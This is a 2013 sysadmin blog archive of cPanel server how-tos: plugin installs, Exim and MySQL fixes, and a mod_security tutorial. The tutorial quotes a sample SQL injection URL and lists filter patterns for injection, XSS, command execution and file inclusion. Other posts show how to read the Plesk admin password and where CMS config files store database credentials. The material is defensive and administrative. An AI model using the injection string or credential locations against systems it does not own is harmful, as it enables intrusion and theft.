Monday, March 25, 2013

Cpanel : JailShell : Virtfs Unmount

Cpanel : JailShell : Virtfs Unmount




If you’re a sysadmin of Cpanel server, you might be aware of the JailShell. Its nothing but a User Shell with limited privileges. Users requesting for shell access to the webhosting server are provided with such shell instead of bash (Which provides root level privileges to users) .

Jailshell limits the users access to their home directory and keeps rest of the file system safe. Still there are chances of such users breaking into your system, so be sure of providing shell access to your servers. Jailshell mounts the filesystems of the users, who login via SSH under a directory called /home/virtfs. This contains users home directory and a false file system which links back to system directories like /bin, /usr etc.

NOTE: Be careful! Don’t remove any folder which is inside /home/virtfs,NEVER. As I said earlier, this folder links back to your systems root file system. You might end up screwing up your server if you attempt it.

So, we got to know that the Jailshell provides a restricted shell access to users and mounts the home directory temporarily at /home/virtfs.

Now, what if you still see the directories of different users mounted under /home/virtfs?

Right, this normally happens when users forget to logout properly from their SSH sessions. As a system admin, you’re responsible to unmount these directories safely.

How do I do that?

You can find all the virtfs mounts in /proc/mounts. Run cat /proc/mounts.

Now, its time to unmount them one by one. For that you have to take the second column of the output. Or write a simple for loop as follows.
for i in `cat /proc/mounts | grep /home/virtfs | cut -d ‘ ‘ -f 2 ` ; do umount $i ; done

If you want to unmount the virtfs of a perticular user, you can simply add an another pipe to for condition with grep username.

Now, you’re done with cleaning of your virtfs.

Installing Google apps, configserver,whmphp,cloudflare,attractaseo,cagefs,config server mail queue ,file explorer

http://gaw.gk-root.com/
http://configserver.com/cp/cse.html
http://www.whmphp.com/installation.php
http://www.cloudflare.com/resources-downloads
http://www.attractaseo.com/partner_kit/plugin.html
http://docs.cloudlinux.com/index.html?installation2.html
http://configserver.com/cp/cmq.html


1003 cd /usr/local/src/
1004 ls
1005 wget http://www.configserver.com/free/cse.tgz
1006 ls
1007 tar -xzf cse.tgz
1008 ls
1009 cd cse
1010 sh install.sh
1011 cd ..
1012 rm -Rfv cse/ cse.tgz
1013 ls
1014 locate config server
1015 ls

================

1016 yum install cagefs
1017 /usr/sbin/cagefsctl --init
1018 ls
1019 mkdir /home/cagefs-skeleton
1020 ln -s /home/cagefs-skeleton /usr/share/cagefs-skeleton
1022 cd /home/
1023 ls
1024 cd cagefs-skeleton/
1025 ls

=================
1026 cd /usr/local/src/
1027 wget http://whmphp.com/download/install.sh;
1028 ls
1029 sh install.sh

=================
1030 cd /usr/local/cpanel
1031 curl -k -L https://github.com/cloudflare/CloudFlare-CPanel/tarball/master > cloudflare.tar.gz
1032 LS
1033 ls
1034 tar -zxvf cloudflare.tar.gz
1035 ls
1036 cd cloudflare-CloudFlare-CPanel-UNIQUE ID/cloudflare/
1037 cd cloudflare-CloudFlare-CPanel-1a7b202/
1038 ls
1039 cd cloudflare/
1040 ls

================
1041 cd /usr/local/src/
1042 ls
1043 wget http://google-apps-wizard-cpanel-plugin.googlecode.com/files/gaw-2.0.tar
1044 ls
1045 tar -xf gaw-2.0.tar
1046 cd gaw-2.0
1047 ./gawupdate.sh

================
1048 cd ..
1011 ll
1012 wget http://configserver.com/free/cmq.tgz
1013 ll
1014 tar -xzf cmq.tgz
1015 cd cmq
1016 ll
1017 sh install.sh

Increase Size of /tmp (/usr/tmpDSK) Partition in Linux

Service httpd stop

service mysql stop
pstree -p | grep tailwatchd
umount /var/tmp
umount -l /tmp
dd if=/dev/zero of=/usr/tmpDSK bs=1024k count=2048
du -sch /usr/tmpDSK
mkfs -t ext3 /usr/tmpDSK
file /usr/tmpDSK
mount -o loop,noexec,nosuid,rw /usr/tmpDSK /tmp
install -d –mode=1777 /tmp
mount -o bind,rw,noexec,nosuid /tmp /var/tmp
service httpd start
service mysql start

 

532 rm -f /usr/tmpDSK
533 dd if=/dev/zero of=/home/tmpDSK bs=1024 count=8192000
535 mkfs.ext3 /home/tmpDSK
536 mount -o loop,rw,noexec,nosuid /home/tmpDSK /tmp
537 mount -o bind,rw,noexec,nosuid /tmp /var/tmp
538 chmod 1777 /tmp
539 cp -Rp /tmp_backup/* /tmp/
540 rm -rf /tmp_backup

 

Saturday, March 23, 2013

How to Install Softaculous on VPS or Dedicated Server with cPanel/WHM?

Step one: cd /usr/local/cpanel/whostmgr/docroot/cgi
Step two: wget -N http://www.softaculous.com/ins/addon_softaculous.php

Step three: chmod 755 addon_softaculous.php
Now go to : WHM > Plugins > Softaculous - Instant Installs and there you go

Friday, March 22, 2013

T=remote_smtp defer (-53): retry time not reached for any host

chech your logs

cd /var/logs

then  more exim_mailing / grep email

you will get the error ,,,,,,,,,,,,,

then try to use the code below to fix the problem

This can be caused by multiple things, however if it happens for each email, it’s likely your exim databases are corrupt; to resolve this you should:

/usr/sbin/exim_tidydb -t 1d /var/spool/exim retry > /dev/null
/usr/sbin/exim_tidydb -t 1d /var/spool/exim reject > /dev/null
/usr/sbin/exim_tidydb -t 1d /var/spool/exim wait-remote_smtp > /dev/null

/scripts/courierup — force
/scripts/eximup –force

If you did that, yet the problem persists, you can either seek professional help, or contact the cPanel support.

References

http://forums.cpanel.net/f43/t-remote_smtp-defer-53-retry-time-not-reached-any-host-72383.html

OR  use below solutions

To solve this issue, you need to

  1. Login to http://gmail.com with the account you use with exim4. It will ask you to login a second time with a captcha… do so

  2. login on all of your machine that use this technique and issue the following command :sudo exim -qff


References

http://blog.mansonthomas.com/2009/04/send-mail-through-gmail-smtp-server.html

 

our ISP is likely blocking your connection via port 25:

[19:25:19 ns313489 root@4396451 ~]cPs# telnet mx1.cpanel.net 25
Trying 208.74.121.68...
telnet: connect to address 208.74.121.68: Connection timed out
[19:34:17 ns313489 root@4396451 ~]cPs# telnet mx2.cpanel.net 25
Trying 208.74.125.122...

[19:40:18 ns313489 root@4396451 ~]cPs# telnet mx1.hotmail.com 25
Trying 65.55.37.120...
telnet: connect to address 65.55.37.120: Connection timed out
Trying 65.55.92.152...
telnet: connect to address 65.55.92.152: Connection timed out


Whereas, it would normally work as such:

~ » telnet mx1.cpanel.net 25
Trying 208.74.121.68...
Connected to mx1.cpanel.net.
Escape character is '^]'.
220-mx1.cpanel.net ESMTP Exim 4.82 #2 Fri, 15 Nov 2013 12:33:33 -0600
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
^]
telnet> quit
Connection closed.

~ » telnet mx1.hotmail.com 25
Trying 65.54.188.94...
Connected to mx1.hotmail.com.
Escape character is '^]'.
220 BAY0-MC2-F9.Bay0.hotmail.com Sending unsolicited commercial or bulk e-mail to Microsoft's computer network is prohibited. Other restrictions are found athttp://privacy.microsoft.com/en-us/anti-spam.mspx. Fri, 15 Nov 2013 10:47:53 -0800
^]
telnet> quit
Connection closed.

I would suggest contacting your provider to see if they have any restrictions on port 25.

plesk passoword

In case of a Plesk server, we can get the admin password by running the following command at server's command prompt.

==
"%plesk_bin%\plesksrvclient" -get
==

In case of Linux server, the password is stored at 'cat /etc/psa/.psa.shadow' or use /usr/local/psa/bin/admin --show-password.

For more information, please refer:

http://kb.parallels.com/en/473
http://kb.parallels.com/en/387

Mod Security Rules

Configuration


The basic modsecurity.conf looks like the following code:










<IfModule mod_security.c>

# Turn the filtering engine On or Off

SecFilterEngine On

# The audit engine works independently and can be turned

# On or Off on a per-server or per-directory basis

SecAuditEngine RelevantOnly

# Make sure that URL encoding is valid

SecFilterCheckURLEncoding On

# Unicode encoding check

SecFilterCheckUnicodeEncoding On

# Only allow bytes from this range

SecFilterForceByteRange 1 255

# Cookie format checks.

SecFilterCheckCookieFormat On

# The name of the audit log file

SecAuditLog logs/audit_log

# Should mod_security inspect POST payloads

SecFilterScanPOST On

# Default action set

SecFilterDefaultAction "deny,log,status:500"

</IfModule>




Now, let’s look at some basic configuration directives:

  • SecFilterEngine: When set to On (that is, SecFilterEngine On), it starts monitoring requests. It is Off (disabled) by default.

  • SecFilterScanPOST: When On, enables scanning the request body/POST payload.

  • SecFilterScanOutput: When On, enables scanning the response body also.


Similarly, to check URL encoding, you can use SecFilterCheckURLEncoding; to control request body buffering, use SecRequestBodyAccess; to control what happens once the response body limit is reached, use SecResponseBodyLimitAction; and to specify the response body buffering limit, use SecResponseBodyLimit.

The full list of configuration directives, their usage and syntax is at available on modsecurity.org.

Rules — the basics


The mod_security rule engine is where gathered data is checked for any malicious or particular content. Rules are directives in the configuration file that decide what to do with the data parsed by the configuration directives. The rule language is a vast topic; we’ll only discuss basic rule-writing syntax, and rule directives to secure Web applications from all the attacks we’ve discussed so far.

The main directive used to create rules is SecRule, whose syntax is as follows:










SecRule VARIABLES OPERATOR [ ACTIONS]





  • VARIABLES: Specify which places to check in an HTTP transaction. mod_securitypreprocesses raw transaction data, making it easy for rules to focus on the logic of detection. Currently, variables are divided into request, server, and response variables, parsing flags and time variables. You can use multiple variables in a single rule with the | operator.

  • OPERATORS: Specify a regular expression, pattern or keyword to be checked in the variable(s). There are four types of operators: string-matchingnumericalvalidation and miscellaneousoperators. Operators always begin with a @ character, and are always followed by a space.

  • ACTIONS: Specify what to do if the rule evaluates to “true” — step on to another rule, display an error message, or any other task. Actions are divided into seven categories: disruptive,flowmetadatavariableloggingspecial and miscellaneous actions.


Here is a simple example of a rule:










SecRule ARGS|REQUEST_HEADERS "@rx <script" id:101,msg: 'XSS

Attack', severity:ERROR,deny,status:404




Here, ARGS and REQUEST_HEADERS are variables (request parameters and request headers, respectively); @rx is the operator used to match a pattern in the variables (here, this pattern is<script); idmsgseveritydeny and status are all actions to be performed if the pattern is matched. This rule is used to avoid XSS attacks by checking for a <script pattern in the request parameters and header, and generates an 'XSS Attack' message. The id:101 is given to the rule; it will deny any matching request with a 404 status response.

Let’s look at another example, for more clarity:










SecRule ARGS:username "@streq admin" chain,deny

SecRule REMOTE_ADDR "!@streq 192.168.1.1"




This is an example of chaining two rules, and the transfer of control to another rule if the first rule holds true. The first rule checks for the string admin in the request’s username parameter. If found, the second rule will be activated, which denies all such requests that are not from the192.168.1.1 IP address. Thus, chaining rules help to create complex rules.

Now, writing filtering rules for each attack will be very cumbersome, and also prone to human error. Here, mod_security provides users with another directive, SecFilter. This looks for a keyword in the request. It will be applied to the first line of the request (the one that looks like GET /index.php?parameter=value HTTP/1.0). In case of POST requests, the body of the request will be searched too (provided request body buffering is enabled). All pattern matches are case-insensitive, by default. The syntax for SecFilter is SecFilter KEYWORD.

Rules against major attacks


Let’s look at some rules to prevent major attacks on Web applications.

SQL injection


Suppose you have an application that is vulnerable to SQL-injection attacks. An attacker could try to delete all records from a MySQL table, like this:










http://www.example.com/login.php?user=arpit';DELETE%20FROM%20users--




This can be prevented with the following directive:










SecFilter "delete[[:space:]]+from"




Whenever such a request is caught by the filter, something similar to the following code is logged to audit_log:










========================================

Request: 192.168.0.207 - - [04/Jul/2006:23:43:00 +1200] "GET /login.php?user=tom';DELETE%20FROM%20users-- HTTP/1.1" 500 1215

Handler: (null)

----------------------------------------

GET /login.php?user=arpit';DELETE%20FROM%20users-- HTTP/1.1

Host: 192.168.0.100

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

mod_security-message: Access denied with code 500. Pattern match "delete[[:space:]]+from" at THE_REQUEST

mod_security-action: 500


HTTP/1.1 500 Internal Server Error

Last-Modified: Fri, 21 Oct 2005 14:30:18 GMT

ETag: "8238-4bf-833a5280"

Accept-Ranges: bytes

Content-Length: 1215

Connection: close

Content-Type: text/html




In response to the attack, SecFilterDefaultAction is applied (the request is denied, logged, and the attacker gets a 500 error). If you want a different action to take place (like, redirect the request to a HTML page that can provide customised warning content), you can specify this in the rule, as follows:










SecFilter "delete[[:space:]]+from" log,redirect:http://example.com/invalid_request.html




To prevent more SQL injection attacks, we can add a few other directives like:










SecFilter "insert[[:space:]]+into"

SecFilter "select.+from"

SecFilter "drop[[:space:]]table"

SecFilter create[[::space:]]+table

SecFilter update.+set.+=

SecFilter union.+select

SecFilter or.+1[[:space:]]*= [[:space:]]1

SecFilter '.+--

SecFilter xp_enumdsn

SecFilter xp_cmdshell

SecFilter xp_regread

SecFilter xp_regwrite

SecFilter xp_regdeletekey




The last five are particularly used for MS SQL server-specific injection attacks.

The only problem with SecFilter is that it scans the whole request instead of particular fields. Here, SecFilterSelective is useful; it allows you to choose exactly what to search. The syntax is:










SecFilterSelective LOCATION KEYWORD [ACTIONS]




Here, LOCATION decides which area of the request to be filtered. Hence, for SQL injection, you can also use:










SecFilterSelective SCRIPT_FILENAME "login.php" chain

SecFilterSelective ARG_user "!^[a-zA-Z0-9\.@!]{1,10}$"




The above code will validate the user parameter, and allow only the white-list of characters we have given. If for some reason you cannot take this approach, and must use a deny-what-is-badmethod, then at least remove single quotes ('), semicolons (;), dashes, hyphens (-), and parenthesis (()).

XSS attacks


For XSS attacks, we can use the following directives:










SecFilter "<(.|\n)+>"

SecFilter "<[[:space:]]*script"

SecFilter "<script"

SecFilter "<.+>"




And also, some additional filters like:










SecFilterSelective THE_REQUEST "<[^>]*meta*\"?[^>]*>"

SecFilterSelective THE_REQUEST "<[^>]*style*\"?[^>]*>"

SecFilterSelective THE_REQUEST "<[^>]*script*\"?[^>]*>"

SecFilterSelective THE_REQUEST "<[^>]*iframe*\"?[^>]*>"

SecFilterSelective THE_REQUEST "<[^>]*object*\"?[^>]*>"

SecFilterSelective THE_REQUEST "<[^>]*img*\"?[^>]*>"

SecFilterSelective THE_REQUEST "<[^>]*applet*\"?[^>]*>"

SecFilterSelective THE_REQUEST "<[^>]*form*\"?[^>]*>"




Though these filters will detect a large number of XSS attacks, they are not foolproof. Due to the multitude of different scripting languages, it is possible for an attacker to create many different methods for implementing an XSS attack that would bypass these filters. Hence, here it is advised that you also keep on adding your own filters.

To protect against an XSS attack done via PHP session cookies, you can use the following:










SecFilterSelective ARG_PHPSESSID "!^[0-9a-z]*$"

SecFilterSelective COOKIE_PHPSESSID "!^[0-9a-z]*$"




Command execution attacks


For command execution attacks, you can use the following directives:










SecFilter /etc/password

SecFilter /bin/ls




Here, the attacker may try to use a string like /bin/./sh to bypass the filter — butmod_security automatically reduces /./ to / and // to /, and also decodes URL-encoded characters. You can also use the white-list approach:










SecFilterSelective SCRIPT_FILENAME "directory.php" chain

SecFilterSelective ARG_dir "!^[a-zA-Z/_-\.0-9]+$"




This chained rule-set will only allow letters, numbers, underscore, dash, forward slash, and period in the dir parameter. Filtering out command directory names is also a good option, and can be done as follows:










SecFilterSelective THE_REQUEST "/^(etc|bin|sbin|tmp|var|opt|dev|kernel)$/"

SecFilterSelective ARGS "bin/"




Session fixation


During session fixation, in one of its phases, the attacker needs to somehow inject the desired session ID into the victim’s browser. We can mitigate these issues by implementing the following:










# Weaker XSS protection, but allows common HTML tags

SecFilter "<[[:space:]]*script"

# Prevent XSS attacks (HTML/Javascript injection)

SecFilter "<.+>"

# Block passing Cookie/Session IDs in the URL

SecFilterSelective THE_REQUEST "(document\.cookie|Set-Cookie|SessionID=)"




Directory traversal attacks


For path/directory traversal attacks, the following directives are mostly used:










SecFilter "\.\./"

SecFilterSelective SCRIPT_FILENAME "/scripts/foo.cgi" chain

SecFilterSelective ARG_home "!^[a-zA-Z].{15,}\.txt"




The last two filters are chained, and will reject all parameters to the home argument that is a filename of more than 15 alpha characters, and that doesn’t have a .txt extension.

Similarly, you can prevent predictable resource location attacks also, and protect against sensitive file misuse, with two recommended solutions. First, remove files that are not intended for public viewing from all Web server-accessible directories. After this, you can create security filters to identify if someone probes for these files:










SecFilterSelective REQUEST_URI "^/(scripts|cgi-local|htbin|cgibin|cgis|win-cgi|cgi-win|bin)/"

SecFilterSelective REQUEST_URI ".*\.(bak|old|orig|backup|c)$"




These two filters will deny access to both — unused, but commonly scanned for directories, and files with common backup extensions.

Web pages that are dynamically created by the directory-indexing function will have a title that starts with “Index of /”. We can use this as a signature, and add the following directives to catch and deny access to this data:










SecFilterScanOutput On

SecFilterSelective OUTPUT "\<title\>Index of /"




Information leakage


Here, we are introduced to the OUTPUT filtering capabilities of mod_security, which you should enable by adding SecFilterScanOutput On in the configuration file. We can easily set up a filter to watch for common database error messages being sent to the client, and then generate a generic 500 status code instead of the verbose message:










SecFilterScanOutput On

SecFilterSelective OUTPUT "An Error Has Occurred" status:500

SecFilterSelective OUTPUT "Fatal error:"




Output filtering can also be used to detect successful intrusions. These rules will monitor output, and detect typical keywords resulting from a command execution on the server.










SecFilterSelective OUTPUT "Volume Serial Number"

SecFilterSelective OUTPUT "Command completed"

SecFilterSelective OUTPUT "Bad command or filename"

SecFilterSelective OUTPUT "file(s) copied"

SecFilterSelective OUTPUT "Index of /cgi-bin/"

SecFilterSelective OUTPUT ".*uid\=\("




Secure file uploads


mod_security is capable of intercepting files uploaded through POST requests and multi-part/form-data encoding through PUT requests. It will always upload files to a temporary directory. You can choose the directory using the SecUploadDir directive:










SecUploadDir /tmp




It is better to choose a private directory for file storage, somewhere that only the Web server user account is allowed access. Otherwise, other server users may be able to access files uploaded through the Web server. You can choose to execute an external script to verify a file before it is allowed to go through to the application. The SecUploadApproveScript directive enables this, like the following example:










SecUploadApproveScript /usr/local/apache/bin/upload_verify.pl




RFI attacks


RFI attacks are generally easy to detect, with something like the following directive:










SecRule ARGS “@rx (?i)^(f|ht)tps?://([^/])” msg:’Remote File Inclusion attack’

# To detect inclusions containing IP address

SecRule ARGS "@rx (ht|f)tps?://([01]?\d\d?|2[0-4]\d|25[0-5])\.([01]?\d\d?|2[0-4]\d|25[0-5])\.([01]?\d\d?|2[0-4]\d|25[0-5])\.([01]?\d\d?|2[0-4]\d|25[0-5])" msg:'Remote File Inclusion attack'

#To detect inclusions containing PHP function ‘include()’

SecRule ARGS "@rx \binclude\s*\([\w|\s]*(ht|f)tps?://" "msg:'Remote File Inclusion'"

# To detect inclusion ending with ‘?’

SecRule ARGS "@rx (ft|htt)ps?.*\?+$" msg:'Remote File Inclusion'




Miscellaneous security features


You can also block IP addresses by the following command:










SecFilterSelective "REMOTE_ADDR" "^192.168.1.1$"




If you have an input field URL in your comment form, and you want to scan the value of URL for the string c99, you do it as follows:










SecFilterSelective "ARG_url" "c99"




The following configuration helps fight HTTP fingerprinting, and accepts only valid protocol versions:










SecFilterSelective SERVER_PROTOCOL !^HTTP/(0\.9|1\.0|1\.1)$




The following configuration allows supported request methods only, and helps fight XST attacks:










SecFilterSelective REQUEST_METHOD !^(GET|HEAD|POST)$




Often during the reconnaissance phase, attackers look for the Web server identity and version. Web servers typically send their identity with every HTTP response, in the Server header. Apache is particularly helpful here; it not only sends its name and full version, by default, but also allows server modules to append their versions. Here, you can confuse the attackers by using something like:










SecServerSignature "Microsoft-IIS/5.0"




PHP code cannot be injected directly, but it may be possible to have code recorded on disk to be executed later, using an LFI attack. The following rule will detect such an injection attempt, but will ignore XML documents, which use similar syntax:










SecRule ARGS "@rx <\?(?!xml)"




Logging


There are three places where, depending on the configuration, you may find mod_securitylogging information:

  • mod_security debug log: If enabled via the SecFilterDebugLevel andSecFilterDebugLog directives, it contains a large number of entries for every request processed. Each log entry is associated with a log level, which is a number from 0 (no messages at all) to 4 (maximum logging). You normally keep the debug log level at 0, and increase it only when you are debugging your rule set.

  • Apache error log: Some of the messages from the debug log will make it into the Apache error log (even if you set mod_security debug log level to 0). These are the messages that require an administrator’s attention, such as information about requests being rejected.

  • mod_security audit log: When audit logging is enabled (using the SecAuditEngine andSecAuditLog directives), mod_security can record each request (and its body, provided request body buffering is enabled) and the corresponding response headers.


Here is an example of an error message resulting from invalid content discovered in a cookie:










[Tue Jun 26 17:44:36 2011] [error] [client 127.0.0.1]

mod_security: Access denied with code 500. Pattern match "!(^$|^[a-zA-Z0-9]+$)"

at COOKIES_VALUES(sessionid) [hostname "127.0.0.1"]

[uri "/test.php"] [unique_id 3434fvnij54jktynv45fC8QQQQAB]




The message indicates that the request was rejected (“Access denied”) with an HTTP 500response because the content of the cookie sessionid contained content that matched the pattern !(^$|^[a-zA-Z0-9]+$). (The pattern allows a cookie to be empty, but if it is not, it must consist only of one or more letters and digits.)
Note: I once again stress that neither LFY nor myself are responsible for the misuse of the information given here. Any attack techniques described here are meant to give you the knowledge that you need to protect your own infrastructure. Please use the tools and techniques sensibly.

This article has just scratched the surface of mod_security. For more details on rule writing and other important directives, please refer to ModSecurity Handbook by Ivan Ristic — a must-read book for anyone interested in this topic.

We will deal with other ways to secure Apache in the next article. Always remember: Know hacking, but no hacking.

Script to change the name servers server wide .

ll /var/named/ |awk -F " " '{print$9}'|grep .db > account
for i in "$(cat account)"; do sed -i -e "s/ns1.privatedns.com/ns3.flashattractions.com/g" ;done

MYSQL Issue:- ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)

[root@servert1 ~]# /etc/init.d/mysqld stop
Stopping MySQL: [ OK ]
[root@servert1 ~]# mysqld_safe --skip-grant-tables &
[1] 13694
[root@servert1 ~]# Starting mysqld daemon with databases from /var/lib/mysql

root@servert1 ~]# mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1
Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> update user set password=PASSWORD("testpass") where User='root';
ERROR 1046 (3D000): No database selected
mysql> show databases;

+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| test |
+--------------------+
3 rows in set (0.13 sec)
mysql> use mysql; 
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+---------------------------+

| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
17 rows in set (0.00 sec)


mysql> update user set password=PASSWORD("testpass") where User='root';
Query OK, 3 rows affected (0.05 sec)
Rows matched: 3 Changed: 3 Warnings: 0

mysql> flush privileges;
Query OK, 0 rows affected (0.04 sec)

mysql> quit
Bye
[root@servert1 ~]# /etc/init.d/mysql restart
bash: /etc/init.d/mysql: No such file or directory
[root@servert1 ~]# /etc/init.d/mysqld restart
STOPPING server from pid file /var/run/mysqld/mysqld.pid
101120 04:17:15 mysqld ended
Stopping MySQL: [ OK ]
Starting MySQL: [ OK ]

[1]+ Done mysqld_safe --skip-grant-tables
root@servert1 ~]# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.0.77 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.


mysql> quit
Bye

.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable

If you are getting “(13)Permission denied: /home/username/public_html/shop/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable, referer: http://www.yourdomain.com/shop/index.html” error in  apache error logs file /usr/local/apache/logs/error_log as well as the site is showing 403 Forbidden Error.

Then first please check the permissions of your folder and .htaccess file because folder permission are most likely 755 and .htaccess permission 644. Permissions can be changed via FTP or SSH.

In case you still are getting the same problem, then it might be the Frontpage Extensions causing the problem. To fix:

* Login into your CPanel account
* Click on Frontpage Extensions icon
* Click on Reinstall extensions button beside your problem domain.
* Done.

(make sure to have a backup copy of your data before reinstalling Frontpage)

And the site is showing “403 Forbidden Error”.
At first, I suspect it’s .htaccess problem, but actually it’s caused by Frontpage Extension.

To solve “.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable” follow the steps below:-

* Login into your CPanel account
* Click on “Frontpage Extensions” icon
* Click on “Reinstall extensions” button beside your problem domain.
*If you do not use any frontpage extensions, it’s good to uninstall this extension
* Done. The “.htaccess pcfg_openfile: unable to check htaccess file” problem has been fixed.

** If you are not on CPanel hosting, please contact your system administrator to fix the problem. ***

http://help.directadmin.com/item.php?id=363

Thursday, March 21, 2013

Configuration File name for Scripts.

Configuration File name for Scripts.

Usually there are many scripts available and they have different configuration file name using which we can use to update the configuration of website and it does include database username and password details.

If you have root or shell access you can locate the file under using below cmd, but make sure are are in the correct document root of the domain.
find . -type f -name “config_file”
i.e
find . -type f -name “wp-config.php”

Below are the Configuration file name for the scripts.

WordPress >> wp-config.php

Joomla >> configuration.php

Drupal >> sites/default/settings.php

osCommerce >> includes/configure.php
admin/includes/configure.php
Cube Cart >> includes/global.inc.php

Zen Cart >> includes/configure.php
admin/includes/configure.php

PHPlist >> config/config.php

Magento >> app/etc/local.xml

Mambo >> configuration.php

MyBB >> inc/config.php

SMF >> Settings.php

Soholaunch >> sohoadmin/config/isp.conf.php

B2 Evolution >> conf/_basic_config.php

Boonex Dolphin >> inc/header.inc.php

Coppermine Photo Gallery >> include/config.inc.php

dotProject >> includes/config.php

FAQMasterFlex >> faq_config.php

Geeklog >> db-config.php
siteconfig.php
ib-common.php

Noahs Classifieds >> app/config.php

Moodle >> config.php

Gallery >> config.php

Nucleus >> config.php

PHP-Nuke >> config.php

phpBB >> config.php

Post-Nuke >> config.php

Siteframe >> config.php

phpWCMS >> include/inc_conf/conf.inc.php

phpWebSite >> conf/config.php

PhpWiki >> admin.php
lib/config.php

TYPO3 >> typo3conf/localconf.php

vBulletin >> includes/config.php

WebCalendar >> includes/settings.php

Xoops >> mainfile.php

 

 

Directory Structure of Cpanel

Directory Structure of Cpanel

=> Apache
==========
Quote:
/usr/local/apache
+ bin- apache binaries are stored here – httpd, apachectl, apxs
+ conf – configuration files – httpd.conf
+ cgi-bin
+ domlogs – domain log files are stored here
+ htdocs
+ include – header files
+ libexec – shared object (.so) files are stored here – libphp4.so,mod_rewrite.so
+ logs – apache logs – access_log, error_log, suexec_log
+ man – apache manual pages
+ proxy -
+ icons -
Init Script :/etc/rc.d/init.d/httpd – apache start script
Cpanel script to restart apache – /scripts/restartsrv_httpd
==========================================================
=> Exim
=========
Quote:
Conf : /etc/exim.conf – exim main configuration file
/etc/localdomains – list of domains allowed to relay mail
Log : /var/log/exim_mainlog – incoming/outgoing mails are logged here
/var/log/exim_rejectlog – exim rejected mails are reported here
/var/log/exim_paniclog – exim errors are logged here
Mail queue: /var/spool/exim/input
Cpanel script to restart exim – /scripts/restartsrv_exim
Email forwarders and catchall address file – /etc/valiases/domainname.com
Email filters file – /etc/vfilters/domainname.com
POP user authentication file – /home/username/etc/domainname/passwd
catchall inbox – /home/username/mail/inbox
POP user inbox – /home/username/mail/domainname/popusername/inbox
POP user spambox – /home/username/mail/domainname/popusername/spam
Program : /usr/sbin/exim (suid – -rwsr-xr-x 1 root root )
Init Script: /etc/rc.d/init.d/exim
==========================================================
=> ProFTPD
============
Quote:
Program :/usr/sbin/proftpd
Init Script :/etc/rc.d/init.d/proftpd
Conf: /etc/proftpd.conf
Log: /var/log/messages, /var/log/xferlog
FTP accounts file – /etc/proftpd/username – all ftp accounts for the domain are listed here
==========================================================
=> Pure-FTPD
=============
Quote:
Program : /usr/sbin/pure-ftpd
Init Script :/etc/rc.d/init.d/pure-ftpd
Conf: /etc/pure-ftpd.conf
Anonymous ftp document root – /etc/pure-ftpd/ip-address
==========================================================
=> Frontpage Extensions
=========================
Quote:
Program – (Install): /usr/local/frontpage/version5.0/bin/owsadm.exe
Uninstall and then install for re-installations
FP files are found as _vti-bin, _vti-pvt, _vti-cnf, vti-log inside the public_html
==========================================================
=> Mysql
===========
Quote:
Program : /usr/bin/mysql
Init Script : /etc/rc.d/init.d/mysql
Conf : /etc/my.cnf, /root/.my.cnf
Data directory – /var/lib/mysql – Where all databases are stored.
Database naming convention – username_dbname (eg: john_sales)
Permissions on databases – drwx 2 mysql mysql
Socket file – /var/lib/mysql/mysql.sock, /tmp/ mysql.sock
==========================================================
=> SSHD
===========
Quote:
Program :/usr/local/sbin/sshd
Init Script :/etc/rc.d/init.d/sshd
/etc/ssh/sshd_config
Log: /var/log/messages
==========================================================
=> Perl
===========
Quote:
Program :/usr/bin/perl
Directory :/usr/lib/perl5/5.8.8/
==========================================================
=> PHP
==========
Quote:
Program :/usr/local/bin/php, /usr/bin/php
ini file: /usr/local/lib/php.ini – apache must be restarted after any change to this file
php can be recomplied using /scripts/easyapache
==========================================================
=> Named(BIND)
================
Quote:
Program: /usr/sbin/named
Init Script: /etc/rc.d/init.d/named
/etc/named.conf
db records:/var/named/
/var/log/messages
==============================================
==>> Cpanel installation directory structure
==============================================
Quote:
/usr/local/cpanel
+ 3rdparty/ – tools like fantastico, mailman files are located here
+ addons/ – AdvancedGuestBook, phpBB etc
+ base/ – phpmyadmin, squirrelmail, skins, webmail etc
+ bin/ – cpanel binaries
+ cgi-sys/ – cgi files like cgiemail, formmail.cgi, formmail.pl etc
+ logs/ – cpanel access log and error log
+ whostmgr/ – whm related files
==========================================================
=> WHM related files
=======================
Quote:
/var/cpanel – whm files
+ bandwidth/ – rrd files of domains
+ username.accts – reseller accounts are listed in this files
+ packages – hosting packages are listed here
+ root.accts – root owned domains are listed here
+ suspended – suspended accounts are listed here
+ users/ – cpanel user file – theme, bwlimit, addon, parked, sub-domains all are listed in this files
+ zonetemplates/ – dns zone template files are taken from here
==========================================================
=> Common CPanel scripts
==========================
Quote:
cpanel/whm Scripts are located in /scripts/
+ addns – add a dns zone
+ addfpmail – Add frontpage mail extensions to all domains without them
+ addfpmail2 -Add frontpage mail extensions to all domains without them
+ addnetmaskips – Add the netmask 255.255.255.0 to all IPs that have no netmask
+ addnobodygrp – Adds the gorup nobody and activates security
+ addpop – add a pop account
+ addservlets – Add JSP support to an account (requires tomcat)
+ addstatus – (Internal use never called by user)
+ adduser – Add a user to the system
+ bandwidth – (OLD)
